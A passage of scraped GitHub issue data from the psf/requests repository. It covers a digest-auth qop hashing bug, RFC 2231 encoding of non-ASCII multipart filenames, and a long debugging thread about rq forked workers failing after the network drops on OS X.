to work now. 
Yay!\n\n```\n$ python\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> from requests.cookies import RequestsCookieJar\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> print r.status_code\n200\n>>> s.cookies = RequestsCookieJar()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> print r.status_code\n200\n```\n", "So the weird thing is: why don't they want that cookie back?\n" ]
https://api.github.com/repos/psf/requests/issues/2408
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2408/labels{/name}
https://api.github.com/repos/psf/requests/issues/2408/comments
https://api.github.com/repos/psf/requests/issues/2408/events
https://github.com/psf/requests/issues/2408
54,311,142
MDU6SXNzdWU1NDMxMTE0Mg==
2,408
Wrong digest header creation when server has qop="auth,auth-int"
{ "avatar_url": "https://avatars.githubusercontent.com/u/10529974?v=4", "events_url": "https://api.github.com/users/berndschultze/events{/privacy}", "followers_url": "https://api.github.com/users/berndschultze/followers", "following_url": "https://api.github.com/users/berndschultze/following{/other_user}", "gists_url": "https://api.github.com/users/berndschultze/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/berndschultze", "id": 10529974, "login": "berndschultze", "node_id": "MDQ6VXNlcjEwNTI5OTc0", "organizations_url": "https://api.github.com/users/berndschultze/orgs", "received_events_url": "https://api.github.com/users/berndschultze/received_events", "repos_url": "https://api.github.com/users/berndschultze/repos", "site_admin": false, "starred_url": "https://api.github.com/users/berndschultze/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/berndschultze/subscriptions", "type": "User", "url": "https://api.github.com/users/berndschultze", "user_view_type": "public" }
[]
closed
true
null
[]
null
7
2015-01-14T11:21:32Z
2021-09-08T23:06:03Z
2015-01-27T18:22:53Z
NONE
resolved
I always get "401 unauthorized" when trying to log in to a server which writes qop="auth,auth-int" in its answer. The problem doesn't exist with Curl. I debugged the requests code and probably found the problem in auth.py. The function build_digest_header in class HTTPDigestAuth calculates noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2) and gives back base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce) to the server. So in our client digest calculation we use qop="auth,auth-int", which we take from the server response, and make the server use qop="auth" in its calculation by giving back this header. While debugging I can log in correctly if I change noncebit on the fly to noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, "auth", HA2) This would be my suggestion for the solution. The qop for the calculation should be the same as we give back in our header.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2408/reactions" }
https://api.github.com/repos/psf/requests/issues/2408/timeline
null
completed
null
null
false
[ "We do not use `qop=auth-int`, we don't support it. When given multiple `qop` values like that in an auth challenge we're allowed to select one, and we have: `auth`.\n\nYou're right, however, about the fix. If we've chosen `auth` that's what we should use in our calculation. The simplest fix should be to pull the calculation of `noncebit` down into the only place it's used.\n\nThat said, can RFCreader @sigmavirus24 confirm that this is correct WRT the specs?\n", "> That said, can RFCreader @sigmavirus24 confirm that this is correct WRT the specs?\n\nIs this the new requests/urllib3 thing? If so, I thoroughly approve.\n", "Thank you for your quick responses.\nWould pulling down noncebit also fit for qop=\"auth,auth-int\"? Wouldn't we still calculate with the wrong qop in case we match the condition \"'auth' in qop.split(',')\" as we would do with qop=\"auth,auth-int\"?\nI think we should not calculate with the qop we read from the response and instead with the one we write into the header (the constant \"auth\").\n", "@berndschultze Sorry, I was insufficiently clear. I agree. What I meant was pulling that line into the `auth` block _and_ changing it to always specifically use `auth`.\n", "@Lukasa You are right, I misunderstood. Thanks again.\n", "I went back through [RFC 2617](https://tools.ietf.org/html/rfc2617#page-8) (which is still the definition of Digest Access Authentication, although parts were _updated_ (not obsoleted) by 7235). tl;dr the ABNF says unambiguously:\n\n```\n qop-value = \"auth\" | \"auth-int\" | token\n```\n\nWhere `token` is one or more letters (`a-zA-Z`), digits (`0-9`), and US-ASCII visible characters (excluding `(),/:;<=>?@[\\]{}` and `\"`). 
In otherwords, _technically_ the server is doing the wrong thing but we can handle it because a `,` should never be part of the `qop-value` so it should be safe to approach this by following roughly this logic:\n\n``` py\nif 'auth' in set(qop_value.split(',')):\n qop = 'auth'\nelse:\n return None # or whatever we return when we're not doing 'auth'\n```\n", "@berndschultze if you want to test out #2415 and let us know how that goes, that'd be awesome.\n" ]
https://api.github.com/repos/psf/requests/issues/2407
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2407/labels{/name}
https://api.github.com/repos/psf/requests/issues/2407/comments
https://api.github.com/repos/psf/requests/issues/2407/events
https://github.com/psf/requests/issues/2407
54,189,745
MDU6SXNzdWU1NDE4OTc0NQ==
2,407
there is a bug when filename contains a non-ascii character
{ "avatar_url": "https://avatars.githubusercontent.com/u/4251771?v=4", "events_url": "https://api.github.com/users/mushanshitiancai/events{/privacy}", "followers_url": "https://api.github.com/users/mushanshitiancai/followers", "following_url": "https://api.github.com/users/mushanshitiancai/following{/other_user}", "gists_url": "https://api.github.com/users/mushanshitiancai/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mushanshitiancai", "id": 4251771, "login": "mushanshitiancai", "node_id": "MDQ6VXNlcjQyNTE3NzE=", "organizations_url": "https://api.github.com/users/mushanshitiancai/orgs", "received_events_url": "https://api.github.com/users/mushanshitiancai/received_events", "repos_url": "https://api.github.com/users/mushanshitiancai/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mushanshitiancai/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mushanshitiancai/subscriptions", "type": "User", "url": "https://api.github.com/users/mushanshitiancai", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-13T12:51:34Z
2021-09-08T23:06:12Z
2015-01-13T13:07:00Z
NONE
resolved
I ues python 2.7.9 and requests 2.5.1 when I do like this: ``` files = {'file1':('中文','hello')} r = requests.post('http://test',files=files) ``` the request is like this(copy from fiddler): ``` Content-Disposition: form-data; name="file1"; filename*=utf-8''%E4%B8%AD%E6%96%87 ``` I think the format of filename is wrong. the right format should be: ``` Content-Disposition: form-data; name="file1"; filename="中文" ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2407/reactions" }
https://api.github.com/repos/psf/requests/issues/2407/timeline
null
completed
null
null
false
[ "in requests\\packages\\urllib3\\fields.py\n\n```\ndef format_header_param(name, value):\n if not any(ch in value for ch in '\"\\\\\\r\\n'):\n result = '%s=\"%s\"' % (name, value)\n try:\n result.encode('ascii')\n except UnicodeEncodeError:\n pass\n else:\n return result\n if not six.PY3: # Python 2:\n value = value.encode('utf-8')\n value = email.utils.encode_rfc2231(value, 'utf-8')\n value = '%s*=%s' % (name, value)\n return value\n```\n\nI think this is related code.\n\nWhen the Content-Type is multipart/form-data,is it correct ues this function to format heaer?\n", "Duplicate of #2313. Please search for existing issues before opening new ones in the future.\n" ]
https://api.github.com/repos/psf/requests/issues/2406
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2406/labels{/name}
https://api.github.com/repos/psf/requests/issues/2406/comments
https://api.github.com/repos/psf/requests/issues/2406/events
https://github.com/psf/requests/issues/2406
54,140,897
MDU6SXNzdWU1NDE0MDg5Nw==
2,406
Unusable `requests` in main and forked processes (`rq` worker script)
{ "avatar_url": "https://avatars.githubusercontent.com/u/104093?v=4", "events_url": "https://api.github.com/users/ducu/events{/privacy}", "followers_url": "https://api.github.com/users/ducu/followers", "following_url": "https://api.github.com/users/ducu/following{/other_user}", "gists_url": "https://api.github.com/users/ducu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ducu", "id": 104093, "login": "ducu", "node_id": "MDQ6VXNlcjEwNDA5Mw==", "organizations_url": "https://api.github.com/users/ducu/orgs", "received_events_url": "https://api.github.com/users/ducu/received_events", "repos_url": "https://api.github.com/users/ducu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ducu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ducu/subscriptions", "type": "User", "url": "https://api.github.com/users/ducu", "user_view_type": "public" }
[]
closed
true
null
[]
null
33
2015-01-13T01:52:32Z
2021-09-08T15:00:53Z
2015-01-15T09:50:52Z
NONE
resolved
This is a follow up from https://github.com/kennethreitz/requests/issues/2399#issuecomment-69675695 As stated there, this is a problem which has to do with `requests` being used in both a main process and forked processes -- the `rq` worker script. If the network goes down even for a short while, `requests` raises few exceptions (ConnectionError) then it becomes unusable and the forked processes get killed instantly if they try to use it (requests.get). The issue is described on the `rq` side as well: https://github.com/nvie/rq/issues/473 Sorry if this not very clear, tired now and I'm struggling with this issue for few weeks already... I've put up a gist to reproduce it (https://gist.github.com/ducu/ee8c0b1028775df6c72e), but please let me know if I can help. Thanks a lot for your support, cheers
{ "avatar_url": "https://avatars.githubusercontent.com/u/104093?v=4", "events_url": "https://api.github.com/users/ducu/events{/privacy}", "followers_url": "https://api.github.com/users/ducu/followers", "following_url": "https://api.github.com/users/ducu/following{/other_user}", "gists_url": "https://api.github.com/users/ducu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ducu", "id": 104093, "login": "ducu", "node_id": "MDQ6VXNlcjEwNDA5Mw==", "organizations_url": "https://api.github.com/users/ducu/orgs", "received_events_url": "https://api.github.com/users/ducu/received_events", "repos_url": "https://api.github.com/users/ducu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ducu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ducu/subscriptions", "type": "User", "url": "https://api.github.com/users/ducu", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2406/reactions" }
https://api.github.com/repos/psf/requests/issues/2406/timeline
null
completed
null
null
false
[ "Does requests misbehave if you pull the link down without forking? That is, if you have a single ordinary script, no forking or workers, using requests, does it hang if you run `ifconfig en0 down` in the same way?\n", "Nope, only when forking. \n\nIf you call `count_words_at_url` in a single process for loop it works properly raising exception while the network is down and recovering (performing requests) when gets back up. \n\n—\nSent from Mailbox\n\nOn Tue, Jan 13, 2015 at 8:28 AM, Cory Benfield [email protected]\nwrote:\n\n> ## Does requests misbehave if you pull the link down without forking? That is, if you have a single ordinary script, no forking or workers, using requests, does it hang if you run `ifconfig en0 down` in the same way?\n> \n> Reply to this email directly or view it on GitHub:\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69705464\n", "Well that's utterly bizarre. What platform are you running on?\n", "I'm using Python 2.7.7 on OS X, will try this on Ubuntu today see if it behaves the same way.\n\n—\nSent from Mailbox\n\nOn Tue, Jan 13, 2015 at 8:36 AM, Cory Benfield [email protected]\nwrote:\n\n> ## Well that's utterly bizarre. What platform are you running on?\n> \n> Reply to this email directly or view it on GitHub:\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69706103\n", "@ducu Thanks for doing that investigation, it'll be helpful (I don't have any machines with Redis installed atm).\n\nWhile we're waiting on that I can infodump a few things. Firstly, requests has little-to-no global state. We certainly don't persist any of our own objects at the top-level, though I can't guarantee right now that none of the import machinery has anything to do with anything.\n\nGarbage collection _should_ ensure that the socket you created initially is cleaned up because you aren't using a Session object. 
This is good, as it means that you shouldn't be accidentally re-using an invalid file handle (I think).\n\nUnfortunately, right now I'm all out of ideas, so I'd like to see if we can get a consistent repro on multiple platforms to exclude single-platform weirdness before I dive in further. We may need to get some serious debugging tools onto this task.\n", "@Lukasa Sure, I hope we can get to the bottom of this.\n\nFor now I'm running the gist on an AWS instance with ubuntu-trusty-14.04-amd64-server-20140927 (ami-f0b11187) via SSH. This means I cannot disable the network adapter (can't do `sudo ifconfig en0 down`), so I thought to use iptables to block outgoing http traffic (`sudo iptables -A OUTPUT -p tcp --dport 80 -j REJECT`) which is not exactly the same.. \n\nBy doing this I cannot reproduce the issue, `requests` behaves properly -- it raises ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) when traffic is rejected by the firewall, and recovers to running normally when the rule is deleted (`sudo iptables -D OUTPUT -p tcp --dport 80 -j REJECT`).\n\nPython 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2\n\nPlease let me know if I'm off-track here..\nI will try doing the same iptables trick on my Mac tonight and see if there's any difference.\n", "## Can you give us more detail about the ConnectionError you originally described?\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Omw home to get the Mac, be back shortly and give all the details\n\nOn Tue, Jan 13, 2015 at 2:20 PM, Ian Cordasco [email protected]\nwrote:\n\n> Can you give us more detail about the ConnectionError you originally\n> \n> ## described?\n> \n> Sent from my Android device with K-9 Mail. 
Please excuse my brevity.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69742693\n> .\n", "I'm inclined to believe you really do have to bring the adapter down for this to be a problem. The nature of the error will be very different: for example, without an adapter the `bind` call should fail, whereas with the iptables solution it'll just hang without receiving messages.\n", "Yep it seems so, there's a different exception I get when taking the network down:\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n\nUnfortunately I don't have a linux box to try this locally by disabling the adapter, but on my Mac it definitely happens. Below you can see the relevant output of the script.\n\nFirst it calls `print count_words_at_url('http://python-rq.org/')` from within the main process, which causes the problem later. If this [line](https://gist.github.com/ducu/ee8c0b1028775df6c72e#file-_test_rq_requests-py-L23) is commented the issue doesn't appear.\n\n```\nLast login: Tue Jan 13 15:10:16 on ttys015\nducusmac:temp Ducu$ . 
env/bin/activate\n(env)ducusmac:temp Ducu$ python -c \"from _test_rq_requests import custom_worker; custom_worker()\"\n489 \n```\n\nWorker starts properly..\n\n```\n15:13:57 RQ worker started, version 0.4.6\n15:13:57 \n15:13:57 *** Listening on test...\n15:13:57 test: _test_rq_requests.count_words_at_url('http://onion.com/1A1cSXV') (b7400d86-015d-4229-ae32-f9d73c842652)\n15:13:58 Job OK, result = 2431\n15:13:58 Result is kept for 500 seconds.\n15:13:58 \n15:13:58 *** Listening on test...\n15:13:58 test: _test_rq_requests.count_words_at_url('http://lifehac.kr/zjndlpn') (65c08d69-23de-48b3-b687-9412f05b46a6)\n15:14:01 Job OK, result = 3752\n15:14:01 Result is kept for 500 seconds.\n15:14:01 \n15:14:01 *** Listening on test...\n15:14:01 test: _test_rq_requests.count_words_at_url('https://medium.com/@micah/conan-what-is-best-in-life-16d832026724') (376d86f7-9b63-41ff-9e0a-1fef2cfaa79b)\n15:14:02 Job OK, result = 3036\n15:14:02 Result is kept for 500 seconds.\n15:14:02 \n```\n\nAnd at this time I'm doing `ifconfig en0 down` in a separate Terminal window taking the network down\n\n```\n15:14:02 *** Listening on test...\n15:14:02 test: _test_rq_requests.count_words_at_url('http://huff.to/1Bap2xl') (c99c2681-2c2e-4eb3-86e0-271890377c71)\n15:14:04 ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File 
\"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in 
send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n15:14:04 Moving job to failed queue.\n15:14:04 \n\n*[Moving job to failed queue approx. 130 times]*\n\n15:14:13 \n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://bit.ly/13ErUHj') (40f5086d-dbc8-4cdc-bf02-a2ee0531edf0)\n15:14:13 ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File 
\"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n15:14:13 Moving job to failed queue.\n15:14:13 \n```\n\nThen suddenly `requests` becomes unusable, doesn't raise exceptions anymore and kills forked processes thus leaving the jobs in the 'started' status. 
It's like the worker goes into this \"strike mode\" and it never recovers not even if the network gets back up.\n\n```\n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://ow.ly/EUAk9') (08cfa2cb-cde3-4567-acfa-86a49eb6dcb9)\n15:14:13 \n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://ow.ly/2SEzc6') (e754bb36-c820-4634-b03c-3741521c23af)\n15:14:14 \n15:14:14 *** Listening on test...\n15:14:14 test: _test_rq_requests.count_words_at_url('http://allday.com/g/bomb') (7918ceda-2e33-4c8d-8fa5-d380dd82eb2c)\n15:14:14 \n\n*[The same output getting job after job and leaving them unprocessed until worker is shut down]*\n\n15:14:27 *** Listening on test...\n15:14:27 test: _test_rq_requests.count_words_at_url('http://www.producthunt.com/posts/nugget') (ca292ec8-e06a-4aa8-872a-458652dfd037)\n^C15:14:27 Warm shut down requested.\n15:14:28 Stopping on request.\n(env)ducusmac:temp Ducu$ \n```\n\nI hope this clarifies a bit the behaviour. I know this is also a `rq` problem but it's the only way I could reproduce the issue. This is my OS X environment \n\n(env)ducusmac:temp Ducu$ python\nPython 2.7.7 (default, Jun 2 2014, 18:55:26) \n[GCC 4.2.1 Compatible Apple LLVM 5.1 (clang-503.0.40)] on darwin\n\nIt would be great if any of you guys would try to run the script on a linux machine locally. If you have any other ideas please let me know.\n", "So that error is related to DNS (which is why a simple `iptables` example doesn't work). I'm surprised this continues after the interface comes back up. I would think TTLs would prevent the DNS cache from being poisoned and causing issues, but DNS caching issues seem like the next logical problem. I wonder if the developers of `rq` have any ideas. 
This is certainly something I've never seen happen with plain `requests`.\n", "@sigmavirus24 I suspected it's because of forking.\n\nAs I mentioned previously, having a single process with a simple loop to perform `count_words_at_url` doesn't cause this issue.. as `requests` recovers after the network gets back up.\n", "@sigmavirus24 But even using the `rq`..\nIt also recovers if `requests.get` is **not** called before forking -- comment that [line](https://gist.github.com/ducu/ee8c0b1028775df6c72e#file-_test_rq_requests-py-L23) and there's no issue.\n", "@ducu Is this a personal mac machine or one running OS X server?\n", "Actually, regardless, I think it's critical to try to find a Linux repro, because I wouldn't be at all surprised to find this is the fault of [discoveryd](http://arstechnica.com/apple/2015/01/why-dns-in-os-x-10-10-is-broken-and-what-you-can-do-to-fix-it/).\n", "I have a personal Mac, not a server. Yeah should find a Linux to test this.. sorry but I don't have it (I'm not much of a Linux connaisseur either). For my use case the workaround would be -- not to use `requests` in the main worker process but only in the forks. This works fine so I can go on..\n\nBut please let me know if I can help fixing this in any other way. Cheers\n\n—\nSent from Mailbox\n", "Ok guys, I managed to test this on Ubuntu via VirtualBox and no issue there..\n\nThe exception being raised when disabling the network is\n\n> ConnectionError: ('Connection aborted.', gaierror(-2, 'Name or service not known'))\n\ndifferent than what I get on the Mac\n\n> ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n\nThe script goes on properly after the network gets back up, so `requests` is getting responses. I guess I can close this ticket, may be what @Lukasa is suggesting, something to do with the OS X DNS service.\n\nThanks a lot for your support, cheers\n", "@ducu No problem! 
I hope this does get resolved, though it looks like discoveryd is ruining a lot of people's days at the minute.\n", "I'm experiencing the same behavior on a worker within a Docker running Ubuntu. I'm considering using urllib2 instead of requests. Did anybody try that as a work-around?\n", "@erdillon What specific behaviour is that? There is a quite lengthy debugging discussion in this issue: how much of that have you seen?\n", "@Lukasa I'm currently chasing rq forked child processes that die on my without notice on a larger POST request. No exception, nothing to be found. I've tracked it down to the actual POST. \n", "So that makes this somewhat unlike the original issue, which did see exceptions from requests. Are you interested in trying to dive in and see if we can work out what is going wrong?\n", "I came to this thru nvie/rq#473. I just re-read this thread and you are right. I'm not seeing ANY exception. The worker goes away with no warning. \n", "So this is at least somewhat different. What you need to do, I think, is to investigate what's happening when the worker dies. You may need to attach something like strace to the worker to get that insight.\n", "@erdillon I believe I'm seeing the same sort of problem -- did you ever figure it out?\n", "@jjwon0 I did not figure it out. But in the meantime i've seen similar behavior go away after upgrading to the latest versions on the requests package. Are you up2date on all the libs?\n", "just reposting an issue I've been having related to this:\n\nHey guys, @selwin @ducu @Lukasa @erdillon \n\nI've got an issue related to this (i think). But it's actually really easy to replicate. When making a request from a worker fails, the worker just dies, but no errors are reported nor is the job sent to the failed queue. 
\n\nmy example:\n\n```\ndef make_request():\n print \"making response\"\n response = requests.get(\"https://some.madeup.url\")\n print \"got response\"\n\nif __name__ == \"__main__\":\n make_request()\n```\n\nWhen I queue `make_request` the process just quits when making the request. Whereas a traceback is thrown when I execute the script directly. Took me a while to track this down, is there a fix or something I may be doing wrong?\n", "Forgot to comment with the solution we came up with, hope it's helpful to someone.\n\nOur problem was that we had a retry manager which would try making requests a few times on an `IOLoop`. It was failing because RQ was just aggressively killing the process once something was queued on the `IOLoop` because nothing was running.\n\nOur solution was for the function sent to RQ to generate a `Future` from the retry manager which only resolved when it was done, and waiting on this future before returning.\n", "@dflatow See @jjwon0. However, the fact that it was causing a traceback in the main thread suggests the issue is with RQ, not requests. \n", "@erdillon see nvie/rq#702 and nvie/rq#710 for the issue of rq not properly handling the killing of the python process of a worker.\n" ]
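The rq-worker behaviour debugged in the thread above (a forked child dying with no traceback reaching the parent) comes down to how the parent sees the child: only as an exit status. A minimal stdlib sketch of that fork-and-reap pattern (POSIX only; `func` stands in for a hypothetical job function, and this is an illustration of the mechanism, not rq's actual implementation):

```python
import os

def run_in_fork(func):
    """Run func in a forked child and return the child's exit code.

    Mirrors the work-horse pattern: an uncaught exception in the child
    surfaces to the parent only as a nonzero exit status, not as a
    traceback, unless the child explicitly logs it before exiting.
    """
    pid = os.fork()
    if pid == 0:  # child process
        try:
            func()
            code = 0
        except Exception:
            code = 1
        os._exit(code)  # exit immediately, skipping atexit handlers
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status)
```

A parent that ignores this status (or kills the child outright, as in nvie/rq#702) loses the failure entirely, which is consistent with jobs silently staying in the 'started' state.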
https://api.github.com/repos/psf/requests/issues/2405
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2405/labels{/name}
https://api.github.com/repos/psf/requests/issues/2405/comments
https://api.github.com/repos/psf/requests/issues/2405/events
